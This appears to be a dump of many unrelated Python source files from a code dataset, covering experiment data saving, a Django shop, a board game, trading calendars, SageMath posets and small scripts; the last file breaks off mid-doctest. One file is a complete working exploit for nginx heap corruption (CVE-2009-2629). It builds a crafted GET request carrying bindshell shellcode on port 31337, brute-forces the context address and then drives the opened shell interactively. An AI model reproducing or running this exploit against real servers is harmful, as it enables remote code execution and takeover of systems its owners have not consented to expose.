content
stringlengths 5
1.05M
|
---|
"""
This is the script for saving the hdf5 file containing the experiment data.
"""
import h5py
from pyccapt.control_tools import loggi
from pyccapt.control_tools import variables
def hdf_creator_oxcart(time_counter, time_ex_s, time_ex_m, time_ex_h):
# save hdf5 file
logger_creator = loggi.logger_creator('hdf5_creator', 'hdf5_creator.log')
logger_creator.info(
"Function - hdf_creator_oxcart | time_counter- > {} | type - {}".format(time_counter, type(time_counter)))
logger_creator.info(
"Function - hdf_creator_oxcart | time_ex_s- > {} | type - {}".format(time_ex_s, type(time_ex_s)))
logger_creator.info(
"Function - hdf_creator_oxcart | time_ex_m- > {} | type - {}".format(time_ex_m, type(time_ex_m)))
logger_creator.info(
"Function - hdf_creator_oxcart | time_ex_h- > {} | type - {}".format(time_ex_h, type(time_ex_h)))
with h5py.File(variables.path + '\\data_%s.h5' % variables.exp_name, "w") as f:
f.create_dataset("apt/high_voltage", data=variables.main_v_dc, dtype='f')
f.create_dataset("apt/pulse_voltage", data=variables.main_v_p, dtype='f')
f.create_dataset("apt/num_events", data=variables.main_counter, dtype='i')
f.create_dataset('apt/temperature', data=variables.main_temperature, dtype='f')
f.create_dataset('apt/main_chamber_vacuum', data=variables.main_chamber_vacuum, dtype='f')
f.create_dataset("apt/time_counter", data=time_counter, dtype='i')
f.create_dataset("time/time_s", data=time_ex_s, dtype='i')
f.create_dataset("time/time_m", data=time_ex_m, dtype='i')
f.create_dataset("time/time_h", data=time_ex_h, dtype='i')
if variables.counter_source == 'TDC':
f.create_dataset("dld/x", data=variables.x, dtype='i')
f.create_dataset("dld/y", data=variables.y, dtype='i')
f.create_dataset("dld/t", data=variables.t, dtype='i')
f.create_dataset("dld/start_counter", data=variables.dld_start_counter, dtype='i')
f.create_dataset("dld/high_voltage", data=variables.main_v_dc_dld, dtype='f')
f.create_dataset("dld/pulse_voltage", data=variables.main_v_p_dld, dtype='f')
elif variables.counter_source == 'TDC_Raw':
f.create_dataset("tdc/start_counter", data=variables.tdc_start_counter, dtype='i')
f.create_dataset("tdc/channel", data=variables.channel, dtype='i')
f.create_dataset("tdc/time_data", data=variables.time_data, dtype='i')
f.create_dataset("tdc/high_voltage", data=variables.main_v_dc_tdc, dtype='f')
f.create_dataset("tdc/pulse_voltage", data=variables.main_v_p_tdc, dtype='f')
elif variables.counter_source == 'DRS':
f.create_dataset("drs/ch0_time", data=variables.ch0_time, dtype='f')
f.create_dataset("drs/ch0_wave", data=variables.ch0_wave, dtype='f')
f.create_dataset("drs/ch1_time", data=variables.ch1_time, dtype='f')
f.create_dataset("drs/ch1_wave", data=variables.ch1_wave, dtype='f')
f.create_dataset("drs/ch2_time", data=variables.ch2_time, dtype='f')
f.create_dataset("drs/ch2_wave", data=variables.ch2_wave, dtype='f')
f.create_dataset("drs/ch3_time", data=variables.ch3_time, dtype='f')
f.create_dataset("drs/ch3_wave", data=variables.ch3_wave, dtype='f')
f.create_dataset("drs/high_voltage", data=variables.main_v_dc_drs, dtype='f')
f.create_dataset("drs/pulse_voltage", data=variables.main_v_p_drs, dtype='f')
def hdf_creator_physic(time_counter, time_ex_s, time_ex_m, time_ex_h):
# save hdf5 file
with h5py.File(variables.path + '\\data_%s.h5' % variables.exp_name, "w") as f:
f.create_dataset("apt/high_voltage", data=variables.main_v_dc, dtype='f')
f.create_dataset("apt/num_events", data=variables.main_counter, dtype='i')
f.create_dataset("apt/time_counter", data=time_counter, dtype='i')
f.create_dataset("time/time_s", data=time_ex_s, dtype='i')
f.create_dataset("time/time_m", data=time_ex_m, dtype='i')
f.create_dataset("time/time_h", data=time_ex_h, dtype='i')
if variables.counter_source == 'TDC':
f.create_dataset("dld/x", data=variables.x, dtype='i')
f.create_dataset("dld/y", data=variables.y, dtype='i')
f.create_dataset("dld/t", data=variables.t, dtype='i')
f.create_dataset("dld/AbsoluteTimeStamp", data=variables.dld_start_counter, dtype='i')
f.create_dataset("dld/high_voltage", data=variables.main_v_dc_dld, dtype='f')
f.create_dataset("tdc/ch0", data=variables.ch0, dtype='i')
f.create_dataset("tdc/ch1", data=variables.ch1, dtype='i')
f.create_dataset("tdc/ch2", data=variables.ch2, dtype='i')
f.create_dataset("tdc/ch3", data=variables.ch3, dtype='i')
f.create_dataset("tdc/ch4", data=variables.ch4, dtype='i')
f.create_dataset("tdc/ch5", data=variables.ch5, dtype='i')
f.create_dataset("tdc/ch6", data=variables.ch6, dtype='i')
f.create_dataset("tdc/ch7", data=variables.ch6, dtype='i')
|
def run():
r.setpos(0,0,0)
r.conf_set('enable_stuck', 1)
r.speed(40)
@_on('motion:stuck')
def _():
_goto('after_stuck', ref='main')
r.goto(-1000, 0, -1)
_label('after_stuck')
r.setpos(x=155/2-1500)
r.goto(0,0)
|
def main():
N, S = input().split()
N = int(N)
result = 0
for i in range(N):
a, b = 0, 0
for c in S[i:]:
if c == 'A':
a += 1
elif c == 'T':
a -= 1
elif c == 'C':
b += 1
elif c == 'G':
b -= 1
if a == 0 and b == 0:
result += 1
print(result)
main()
|
import datetime
from pandas import Timestamp, DatetimeIndex, DataFrame
from backtrader.tradingcal import TradingCalendarBase
from backtrader.utils import tzparse
from backtrader.utils.py3 import string_types
class TradingCalendarsTradingCalendar(TradingCalendarBase):
params = (
('calendar', None),
('cachesize', 365),
('tz', None),
)
def __init__(self): # pylint: disable=super-init-not-called
self._calendar = self.p.calendar # pylint: disable=no-member
if isinstance(self._calendar, string_types):
from trading_calendars import get_calendar
self._calendar = get_calendar(self._calendar)
self.dcache = DatetimeIndex([0.0])
self.idcache = DataFrame(index=DatetimeIndex([0.0]))
self.csize = datetime.timedelta(days=self.p.cachesize) # pylint: disable=no-member
self._tz = self.p.tz # pylint: disable=no-member
if self._tz is None:
self._tz = self._calendar.tz
elif isinstance(self._tz, string_types):
self._tz = tzparse(self._tz)
def _nextday(self, day):
d = day + self._calendar.day
return d, d.isocalendar()
def schedule(self, day, tz=None): # pylint: disable=arguments-differ
session = Timestamp(year=day.year, month=day.month, day=day.day)
opening, closing = self._calendar.open_and_close_for_session(session)
if tz is None:
tz = self._tz
if tz is not None:
opening = opening.astimezone(tz)
closing = closing.astimezone(tz)
opening = opening.to_pydatetime()
closing = closing.to_pydatetime()
return opening, closing
class KrxTradingCalendar(TradingCalendarsTradingCalendar):
params = (
('calendar', 'XKRX'),
('cachesize', 365),
('tz', 'Asia/Seoul'),
)
|
import itertools
import logging
import os
import time
from urllib.parse import urlparse
from urllib.request import quote
import requests
from bs4 import BeautifulSoup
from requests.sessions import TooManyRedirects
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)
class AccountHandler:
def __init__(self, account_list_path:str=None):
self.account_list_path = account_list_path or os.environ.get("ACCOUNT_LIST_PATH")
self.account_rotator = self.account_rotaion_generator()
def rotate(self) -> str:
account_key = next(self.account_rotator)
self.set_account(account_key)
return account_key
def account_rotaion_generator(self) -> None:
with open(self.account_list_path) as account_file:
accounts = [account.strip() for account in account_file.readlines()]
if not accounts:
accounts = [""]
round_robin = itertools.cycle(accounts)
return round_robin
@staticmethod
def set_account(auth_key:str=None) -> None:
os.environ["UK_AUTH_KEY"] = auth_key
def get_content_make_soup(url:str, **kwargs) -> BeautifulSoup:
page_content = get_content(url=url, **kwargs)
if page_content == 1:
return 1
soup = BeautifulSoup(page_content, features="html.parser")
return soup
def get_content(url:str, headers:dict={}, proxy="") -> bytes:
default_headers = {'User-Agent' : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0"}
headers.update(default_headers)
url_parts = urlparse(url)
url = url_parts._replace(path=quote(url_parts.path)).geturl()
sleep_time = 5
while True:
try:
resp = requests.get(url,
proxies=dict(http=proxy, https=proxy),
headers=headers)
return resp.content
except TooManyRedirects:
logging.error(f"TooManyRedirects, url: {url}, Error: {e}")
return 1
except Exception as e:
logging.error(f"Network Error, url: {url}, Error: {e}")
time.sleep(sleep_time)
sleep_time += 1
|
import requests as rs
from .makerequest import makeRequest
make = makeRequest("token")
def checkAvailableUser(username):
"""This function will return
whether the given username for registration is available for new registration"""
resp = rs.get(make.API + "/register/search/?username={}".format(username))
return resp
def addMedicine(medicine: object):
"""Data required are "name", "description", "price", "quantity", "medicalId" """
return make.makePostRequest(make.API + "/medicine/", medicine)
def createMedical(medical: object, file):
"""Data required are Medical "name", "address", "pincode", "latitude", "longitude", "phone", "email" """
return make.CreateMedicalPost(make.API + "/", medical, file)
def getMedicine(medical_id):
resp = make.GetRequest(make.API + "/mymedical/{}/".format(medical_id))
return resp
def getMyMedical():
resp = make.GetRequest(make.API + "/mymedical/")
return resp
def getMedicalDetails(medical_id):
resp = make.GetRequest(make.API + "/{}/".format(medical_id))
return resp.json()[0]
def getUserDetails(name):
userMake = makeRequest(name)
resp = userMake.GetRequest(make.API + "/user/")
return resp
def getMedicineDetails(ID):
return make.GetRequest(make.API + '/medicine/{}/'.format(ID))
def deleteMedicine(ID):
return make.DeleteRequest(make.API + '/medicine/{}/'.format(ID))
def deleteMedical(ID):
return make.DeleteRequest(make.API + '/{}/'.format(ID))
def updateMedicine(medicine: object, ID):
return make.PutRequest(make.API + '/medicine/{}/'.format(ID), medicine)
def updateMedical(medical, ID):
return make.PutRequest(make.API + '/{}/'.format(ID), medical)
def getTrendingMed(pincode):
return make.GetRequest(make.API + '/popularmedicine/?pincode={}'.format(pincode))
|
#!/usr/bin/env python
#
# Exploit Title: nginx heap corruption
# Date: 08/26/2010
# Author: aaron conole <[email protected]>
# Software Link: http://nginx.org/download/nginx-0.6.38.tar.gz
# Version: <= 0.6.38, <= 0.7.61
# Tested on: BT4R1 running nginx 0.6.38 locally
# CVE: 2009-2629
#
# note: this was written and tested against BT4. This means it's an
# intel x86 setup (ie: offsets for 32-bit machine, etc.). YMMV
# also - only tested successfully against nginx 0.6.38
# you'll definitely need to modify against other versions
#
# you'll need to know where the offset is going to land, and what the pad is
# from that point to when you've tained execution flow.
#
# A quick way to find out just for verification would be to launch nginx,
# attach GDB to the worker and target it with the exploit, setting the offset
# to 0, or some other arbitrary value. It should crash on a piece of code which
# resembles:
# if (ctx->offset)
#
# At that point, merely dump the *r; capture the value for the data pointer
# (it'll be the one with "GET //../Aa0") and add 131 to it (decimal 131 to the
# hex pointer value). That should give you a good area to test with. You might
# want to use the range at that point and set the last octet to 00.
#
# NOTE: you'll need a configuration with merge_slashes enabled. I haven't yet
# found a "magic" combination that would cause the state machine to do
# what I want to make the bug trigger. Once I do, you can bet BUG will be
# replaced.
#Basically, on BT4:
#- compile
#- edit the configuration to enable merge slashes (just insert a line above the sendpage / sendfile config option "merge_slashes off;")
#- Launch nginx, and attach GDB to the worker
#- Send the exploit at it with offset 0x11111111
#- When the worker gets a sigsegv, it will be on a line which looks like "if (ctx->offset)", at that point type "p *r"
#- In the r data structure will be a few different fields, one which is a buffer that contains "GET //../Aa0Aa1Aa2..". This buffer has an address (lets say 0x8c1d32f).
#- Save off this address, and detach from the worker. A new one will spawn (the "manager" process will keep it going).
#- At this point, rerun the exploit, setting the offset to 0x8c1d300 and adding the -b flag
#- In a minute or two, you should be given the shell.
import os
import sys
import socket
import select
import struct
import time
import urllib
REQUEST_METHOD='GET '
# NOTE - this is a 32-bit null pointer. A 64-bit version would be 8-bytes (but take care to re-verify the structures)
NULLPTR='\x00\x00\x00\x00'
# NOTE - this shellcode was shamelessly stolen from the www
# port 31337 bindshell for /bin/sh
SHELL='\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80'
# Why did I write this up this way? Because given enough time, I think I can
# find a proper set of state change which can give me the same effect (ie: ../
# appearing as the 3rd, 4th, and 5th characters) at a later date.
# That's all controlled by the complex uri parsing bit, though.
DOUBLE_SLASH='//../'
BUG=DOUBLE_SLASH
# taken from the metasploit pattern_create.rb
PATTERN='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4'
def connect_socket(host,port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect( (host, port) )
except:
return 0
#sock.setblocking(0)
return sock
def handle_connection(sock):
while(1):
r, w, e = select.select( [sock, sys.stdin],
[],
[sock, sys.stdin] )
for s in r:
if s == sys.stdin:
buf = sys.stdin.readline()
try:
if buf != '':
sock.send(buf)
except:
print "Xon close?"
return 0
elif s == sock:
try:
buf = sock.recv(100)
except:
print "Xon close?"
return 0
if buf != '':
sys.stdout.write(buf)
def main(argv):
argc = len(argv)
if argc < 4:
print "usage: %s <host> <port> <ctx_addr> [-b]" % (argv[0])
print "[*] exploit for nginx <= 0.6.38 CVE 2009-2629"
print "[*] host = the remote host name"
print "[*] port = the remote port"
print "[*] ctx_addr is where the context address should begin at"
print "[*] -b specifies a brute-force (which will start at ctx_addr"
sys.exit(0)
host = argv[1]
port = int(argv[2])
ctx_addr = int(argv[3],16)
brute_flag = 0
if(argc == 5):
brute_flag = 1
testing = 1
print "[*] target: %s:%d" % (host, port)
try:
sd = urllib.urlopen("http://%s:%d" % (host, port))
sd.close()
except IOError, errmsg:
print "[*] error: %s" % (errmsg)
sys.exit(1)
print "[*] sending exploit string to %s:%d" % (host, port)
while(testing):
CTX_ADDRESS = struct.pack('<L',ctx_addr)
CTX_OUT_ADDRESS = struct.pack('<L', ctx_addr-60)
POOL_ADDRESS = struct.pack('<L',ctx_addr+56)
DATA_ADDRESS = struct.pack('<L',ctx_addr+86)
RANGE_ADDRESS = struct.pack('<L',ctx_addr+124)
SHELL_ADDRESS = struct.pack('<L',ctx_addr+128)
#PADDING
SHELLCODE=PATTERN[:67]
#the output context structure
SHELLCODE+=NULLPTR*9+POOL_ADDRESS+NULLPTR*4+SHELL_ADDRESS
#Magic
SHELLCODE+=CTX_OUT_ADDRESS+CTX_ADDRESS+NULLPTR
#this is the context object - some null ptrs, then we set range, then
#pool address
SHELLCODE+=NULLPTR*3+RANGE_ADDRESS+'\x01\x00\x00\x00'
SHELLCODE+=NULLPTR*2+POOL_ADDRESS
#this is the data buffer object
SHELLCODE+=NULLPTR*4+SHELL_ADDRESS+NULLPTR
#this is the pool memory structure ..
SHELLCODE+=DATA_ADDRESS+NULLPTR+POOL_ADDRESS+NULLPTR*12+NULLPTR
# this is the range structure
SHELLCODE+='\xff\xff\xff\xff'+NULLPTR*3
SHELLCODE+=SHELL
payload = REQUEST_METHOD
payload += BUG
payload += SHELLCODE
payload += ' HTTP/1.0\r\n\r\n'
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.connect((host, port))
sd.send(payload)
sd.close()
if (brute_flag):
nsock = connect_socket(host,31337)
if nsock != 0:
print "[*] Successful Exploit via buffer: %x" % (ctx_addr)
testing = 0
handle_connection(nsock)
else:
ctx_addr = ctx_addr + 1
else:
testing = 0
print "[*] FIN."
if __name__ == "__main__":
main(sys.argv)
sys.exit(0)
# EOF
|
from django.shortcuts import render, get_object_or_404,redirect
from django.views.generic import TemplateView, ListView
from cart.forms import CartAddProductForm
from .models import Category, Product
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import authenticate,login,logout
from .forms import SignUpForm, RepairForm
from django.core.paginator import Paginator
from django.core.mail import send_mail
# Create your views here.
def homepage(request):
return render(request, 'shop/product/home.html')
def repairspage(request):
return render(request, 'shop/product/repairs.html')
def phonepage(request):
if request.GET.get('boob'): # write your form name here
phones = Product.objects.filter(category__slug='phones')
categories = Category.objects.all()
try:
status = Product.objects.filter(category__slug='phones')
categories = Category.objects.all()
return render(request,"shop/product/phone.html",{'products':status, 'categories': categories, })
except:
return render(request,"shop/product/phone.html",{'products':status, 'categories': categories, })
else:
status = Product.objects.filter(category__slug='phones')
categories = Category.objects.all()
return render(request, 'shop/product/phone.html', {'products':status, 'categories': categories, })
def laptoppage(request):
if request.GET.get('boob'): # write your form name here
laptops = Product.objects.filter(category__slug='laptops')
categories = Category.objects.all()
try:
status = Product.objects.filter(category__slug='laptops')
categories = Category.objects.all()
return render(request,"shop/product/laptop.html",{'products':status, 'categories': categories, })
except:
return render(request,"shop/product/laptop.html",{'products':status, 'categories': categories, })
else:
status = Product.objects.filter(category__slug='laptops')
categories = Category.objects.all()
return render(request, 'shop/product/laptop.html', {'products':status, 'categories': categories, })
def tvpage(request):
if request.GET.get('boob'): # write your form name here
tvs = Product.objects.filter(category__slug='tvs')
categories = Category.objects.all()
try:
status = Product.objects.filter(category__slug='tvs')
categories = Category.objects.all()
return render(request,"shop/product/tv.html",{'products':status, 'categories': categories, })
except:
return render(request,"shop/product/tv.html",{'products':status, 'categories': categories, })
else:
status = Product.objects.filter(category__slug='tvs')
categories = Category.objects.all()
return render(request, 'shop/product/tv.html', {'products':status, 'categories': categories, })
def product_list(request, category_slug=None):
myproduct_list = Product.objects.all()
page = request.GET.get('page', 1)
paginator = Paginator(myproduct_list, 20) # Show 25 contacts per page.
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
phones = Product.objects.filter(category__name='phones')
category = None
categories = Category.objects.all()
products = Product.objects.filter(available=True)
if category_slug:
category = get_object_or_404(Category, slug=category_slug)
products = products.filter(category=category)
return render(request,
'shop/product/list.html',
{'category': category,
'categories': categories,
'products': products,
'page_obj': page_obj,
'phones':phones})
def product_detail(request, id, slug):
product = get_object_or_404(Product,id=id,slug=slug,available=True)
cart_product_form = CartAddProductForm()
return render(request,
'shop/product/detail.html',
{'product': product,
'cart_product_form': cart_product_form})
def signUpView(request):
if request.method == "POST":
form =SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
user = authenticate(request, username=username, password=password)
login(request,user)
return redirect('shop:product_list')
else:
form = SignUpForm()
context = {
'form':form,
}
return render(request,'shop/auth/signup.html',context)
def repair_form(request):
if request.method == 'POST':
# create object of form
form = RepairForm(request.POST)
if form.is_valid():
# save the form data to model
form.save()
else:
form = RepairForm()
context = {
'form':form,
}
return render(request,'shop/product/repair.html', context)
def signInView(request):
if request.method == 'POST':
form =AuthenticationForm(data=request.POST)
if form.is_valid():
username = request.POST['username']
password = request.POST['password']
user =authenticate(username=username,password=password)
if user is not None:
login(request,user)
return redirect('shop:product_list')
else:
return redirect('shop:signup')
else:
form = AuthenticationForm()
context = {
'form':form,
}
return render(request,'shop/auth/signin.html',context)
def signoutView(request):
logout(request)
return redirect('shop:signin')
def search(request):
if request.GET.get('boob'): # write your form name here
product_name = request.GET.get('search')
categories = Category.objects.all()
try:
status = Product.objects.filter(productname__icontains=product_name)
categories = Category.objects.all()
return render(request,"shop/product/search.html",{'products':status, 'categories': categories, })
except:
return render(request,"shop/product/search.html",{'products':status, 'categories': categories, })
else:
product_name = request.GET.get('search')
status = Product.objects.filter(name__icontains=product_name)
categories = Category.objects.all()
return render(request, 'shop/product/search.html', {'products':status, 'categories': categories, })
|
import boto3
from auditlog.writer.writer import kinesis_writer
kinesis_writer.set_client(boto3.client('kinesis', endpoint_url='http://localhost:4566/')) |
# code:utf-8
'''
@author: memect
@date: 16/04/2018
@mail: [email protected]
@description: 获取上市公司:基本信息,利润表,资产负债表,现金流量表 python3示例代码
'''
import requests
import json
import config
HEADERS = config.HEADERS#{'Authorization': APPCODE, }
class CompanyInfoAPI:
def __init__(self, field,eng_name):
"""field in ["资产负债表","现金流量表","基本信息","利润表"]
eng_name in ["balance_sheet_info","cash_flows_statement_info","f10_info","income_statmenet_info"]
"""
self.field = field
self.eng_name=eng_name
def _get_info(self,url, query_dict={"field": "基本信息", "period": '2017'}):
"""获取公司信息程序"""
response = requests.request("GET", url, headers=HEADERS, params=query_dict)
print(response.status_code)
return response.status_code, response.text
def get_company_info(self, company_code, period):
URL = 'http://memect0006.market.alicloudapi.com/company/' + company_code
querystring = {"field": self.field, "period": period}
status_code, res_text = self._get_info(url=URL, query_dict=querystring)
if status_code != 200:
return False, None
json_dict = json.loads(res_text)
json_dict['company_code'] = company_code
json_dict['period'] = period
return True, json_dict
def get_company_code_list_info(self,period):
"""根据period和field筛选符合条件的公司股票代码list。
period in [2015,2016,2017Q3,2017]
"""
URL = 'http://memect0006.market.alicloudapi.com/companys/codelist'
querystring = {"field": self.field, "period": period}
status_code, res_text = self._get_info(url=URL, query_dict=querystring)
if status_code != 200:
print(res_text)
return False, None
js_list = json.loads(res_text)
return True,js_list
pass
if __name__ == '__main__':
cash_api=CompanyInfoAPI(field="现金流量表",eng_name='cash_flows_statement_info')
res, text = cash_api.get_company_code_list_info(period="2017")
print(res, text)
res, text = cash_api.get_company_info(company_code='000001',period="2017")
print(res, text)
# get_income_statmenet_info(company_code="000001",period="2016")
# get_balance_sheet_info(company_code="000005",period="2015")
# get_cash_flows_statement_info(company_code="600000",period="2015")
|
with open('input2.txt', 'r') as file:
data = file.read().split('\n')
v = 0
iv = 0
for line in data:
if line.count(' ') != 2:
continue
r, l, p = line.split(' ')
min_, max_ = map(int, r.split('-'))
min_ -= 1
max_ -= 1
l = l.replace(':', '')
if (len(p) > max_ and ((p[min_] == l) ^ (p[max_] == l))) or (min_ < len(p) < max_ and p[min_] == l):
v += 1
else:
# print(r,l,p)
iv += 1
print(v, iv)
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
def joe_say(text):
template = r'''
=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=
// {message} \\
=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=
\\
\\
----------------
/ \
/ \
| OO O0 |
| OO OO |
\ - /
\ DDDDDD /
\ DDDD /
\____________/
'''.format(message=text)
return template
|
import numpy as np
from piece import Piece
import time
from scipy.ndimage import convolve
class Board:
def __init__(self, size = 20, player_colors = [1,2,3,4]):
self.size = size
self.board = np.zeros((size,size), dtype = int)
self.start_squares = [[0,0], [0, size-1], [size-1, 0], [size-1, size-1]]
self.player_colors = player_colors
self.c = [[1,0,1],[0,0,0],[1,0,1]]
self.a = [[0,1,0],[1,1,1],[0,1,0]]
def add_piece(self, piece, x, y):
if not self.valid_move(piece, x, y):
return False
p_shape = piece.get_shape()
px, py = p_shape.shape
self.board[x:x + px, y:y+py] += p_shape
return True
def valid_move(self, piece, x, y):
p_shape = piece.get_shape()
p_color = piece.get_color()
px, py = p_shape.shape
shape_coords = np.argwhere(p_shape != 0) + [x,y]
if x + px > self.size or y + py > self.size: #Piece off the edge of the board
#print("Piece off the edge of the board")
return False
if len(np.nonzero(self.board[x:x+px,y:y+py] * piece.get_shape())[0]) > 0: #Piece on top of another piece
#print("Piece on top of another")
return False
for i in self.generate_adjacents(shape_coords): #Piece adjacent to same color
if i[0] < self.size and i[0] >= 0 and i[1] < self.size and i[1] >= 0 and self.board[i] == p_color:
#print("piece adjacent to the same color")
return False
for i in self.generate_corners(shape_coords): #Piece is touching a corner
if i[0] < self.size and i[0] >= 0 and i[1] < self.size and i[1] >= 0 and self.board[i] == p_color:
return True
for x in shape_coords:
if list(x) in self.start_squares:
return True
#print("else")
return False
def generate_adjacents(self, shape_coords):
adj = set()
for i in shape_coords:
adj.add((i[0] + 1, i[1]))
adj.add((i[0], i[1] + 1))
adj.add((i[0] - 1, i[1]))
adj.add((i[0], i[1] - 1))
return adj
def generate_corners(self, shape_coords):
corners = set()
for i in shape_coords:
corners.add((i[0] + 1, i[1] + 1))
corners.add((i[0] - 1, i[1] + 1))
corners.add((i[0] + 1, i[1] - 1))
corners.add((i[0] - 1, i[1] - 1))
#print(corners - self.generate_adjacents(shape_coords)) #true corners
return corners
def get_color_corners(self, color):
one_color_board = np.array(self.board == color, dtype="int") * color
corner_board = convolve(one_color_board, self.c, mode='constant') - 20 * convolve(one_color_board, self.a, mode='constant') - 20 * self.board
return np.array(np.where(corner_board >= 1))
def get_moves_list(self, player, corners):
playable_moves = []
pcs = player.get_pieces()
if len(pcs) == 21:
start_squares = np.array([[0,0,19,19],[0,19,0,19]])
corners = np.hstack((corners, start_squares))
for p in pcs:
moves = pcs[p].get_legal_moves()
pcs[p].reset()
for m in moves:
for c in m:
if c == 'r':
pcs[p].rotate()
elif c == 'f':
pcs[p].flip()
for i in moves[m]:
shp = pcs[p].get_shape()
for j in range(len(corners[0])):
x = corners[0,j]+i[0]
y = corners[1,j]+i[1]
if x < 0 or x > self.size - 1:
pass
elif y < 0 or y > self.size - 1:
pass
elif self.valid_move(pcs[p],x,y):
playable_moves.append((p, m, x, y))
pcs[p].reset()
return playable_moves
def get_board(self):
return self.board
|
"""
Cartesian products of Posets
AUTHORS:
- Daniel Krenn (2015)
"""
#*****************************************************************************
# Copyright (C) 2015 Daniel Krenn <[email protected]>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from __future__ import print_function
from sage.sets.cartesian_product import CartesianProduct
class CartesianProductPoset(CartesianProduct):
r"""
A class implementing Cartesian products of posets (and elements
thereof). Compared to :class:`CartesianProduct` you are able to
specify an order for comparison of the elements.
INPUT:
- ``sets`` -- a tuple of parents.
- ``category`` -- a subcategory of
``Sets().CartesianProducts() & Posets()``.
- ``order`` -- a string or function specifying an order less or equal.
It can be one of the following:
- ``'native'`` -- elements are ordered by their native ordering,
i.e., the order the wrapped elements (tuples) provide.
- ``'lex'`` -- elements are ordered lexicographically.
- ``'product'`` -- an element is less or equal to another
element, if less or equal is true for all its components
(Cartesian projections).
- A function which performs the comparison `\leq`. It takes two
input arguments and outputs a boolean.
Other keyword arguments (``kwargs``) are passed to the constructor
of :class:`CartesianProduct`.
EXAMPLES::
sage: P = Poset((srange(3), lambda left, right: left <= right))
sage: Cl = cartesian_product((P, P), order='lex')
sage: Cl((1, 1)) <= Cl((2, 0))
True
sage: Cp = cartesian_product((P, P), order='product')
sage: Cp((1, 1)) <= Cp((2, 0))
False
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: Cs = cartesian_product((P, P), order=le_sum)
sage: Cs((1, 1)) <= Cs((2, 0))
True
TESTS::
sage: Cl.category()
Join of Category of finite posets and
Category of Cartesian products of finite enumerated sets
sage: TestSuite(Cl).run()
sage: Cp.category()
Join of Category of finite posets and
Category of Cartesian products of finite enumerated sets
sage: TestSuite(Cp).run()
.. SEEALSO::
:class:`CartesianProduct`
"""
def __init__(self, sets, category, order=None, **kwargs):
r"""
See :class:`CartesianProductPoset` for details.
TESTS::
sage: P = Poset((srange(3), lambda left, right: left <= right))
sage: C = cartesian_product((P, P), order='notexisting')
Traceback (most recent call last):
...
ValueError: No order 'notexisting' known.
sage: C = cartesian_product((P, P), category=(Groups(),))
sage: C.category()
Join of Category of groups and Category of posets
"""
if order is None:
self._le_ = self.le_product
elif isinstance(order, str):
try:
self._le_ = getattr(self, 'le_' + order)
except AttributeError:
raise ValueError("No order '%s' known." % (order,))
else:
self._le_ = order
from sage.categories.category import Category
from sage.categories.posets import Posets
if not isinstance(category, tuple):
category = (category,)
category = Category.join(category + (Posets(),))
super(CartesianProductPoset, self).__init__(
sets, category, **kwargs)
def le(self, left, right):
r"""
Test whether ``left`` is less than or equal to ``right``.
INPUT:
- ``left`` -- an element.
- ``right`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method uses the order defined on creation of this
Cartesian product. See :class:`CartesianProductPoset`.
EXAMPLES::
sage: P = posets.ChainPoset(10)
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((P, P), order=le_sum)
sage: C.le(C((1, 6)), C((6, 1)))
True
sage: C.le(C((6, 1)), C((1, 6)))
False
sage: C.le(C((1, 6)), C((6, 6)))
True
sage: C.le(C((6, 6)), C((1, 6)))
False
"""
return self._le_(left, right)
def le_lex(self, left, right):
r"""
Test whether ``left`` is lexicographically smaller or equal
to ``right``.
INPUT:
- ``left`` -- an element.
- ``right`` -- an element.
OUTPUT:
A boolean.
EXAMPLES::
sage: P = Poset((srange(2), lambda left, right: left <= right))
sage: Q = cartesian_product((P, P), order='lex')
sage: T = [Q((0, 0)), Q((1, 1)), Q((0, 1)), Q((1, 0))]
sage: for a in T:
....: for b in T:
....: assert(Q.le(a, b) == (a <= b))
....: print('%s <= %s = %s' % (a, b, a <= b))
(0, 0) <= (0, 0) = True
(0, 0) <= (1, 1) = True
(0, 0) <= (0, 1) = True
(0, 0) <= (1, 0) = True
(1, 1) <= (0, 0) = False
(1, 1) <= (1, 1) = True
(1, 1) <= (0, 1) = False
(1, 1) <= (1, 0) = False
(0, 1) <= (0, 0) = False
(0, 1) <= (1, 1) = True
(0, 1) <= (0, 1) = True
(0, 1) <= (1, 0) = True
(1, 0) <= (0, 0) = False
(1, 0) <= (1, 1) = True
(1, 0) <= (0, 1) = False
